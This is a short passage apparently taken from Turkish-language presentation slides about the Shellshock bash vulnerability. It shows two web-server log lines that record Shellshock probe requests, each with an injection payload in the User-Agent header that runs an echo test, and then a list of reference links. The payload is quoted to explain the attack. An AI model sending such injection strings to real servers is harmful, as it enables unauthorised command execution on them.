180.186.121.254 - - [14/Oct/2014:21:51:53 +0300] "GET /cgi-bin/help.cgi HTTP/1.1" 404 477 "-" "() { :;}; echo `echo xbash:test`" • 180.186.121.254 - - [14/Oct/2014:21:51:52 +0300] "GET /cgi-bin/index.cgi HTTP/1.1" 404 478 "-" "() { :;}; echo `echo
22.
Kaynaklar • http://www.dwheeler.com/essays/shellshock.html#timeline
• http://seclists.org/oss-sec/2014/q4/92 • http://www.businessinsider.com.au/romanian-hackers-allegedly-used- the-shellshock-bug-to-hack-yahoos-servers-2014-10 • http://www.wired.com/2014/10/shellshockresearcher/ • http://blog.malwaremustdie.org/2014/09/linux-elf-bash-0day-fun-has- only-just.html?m=1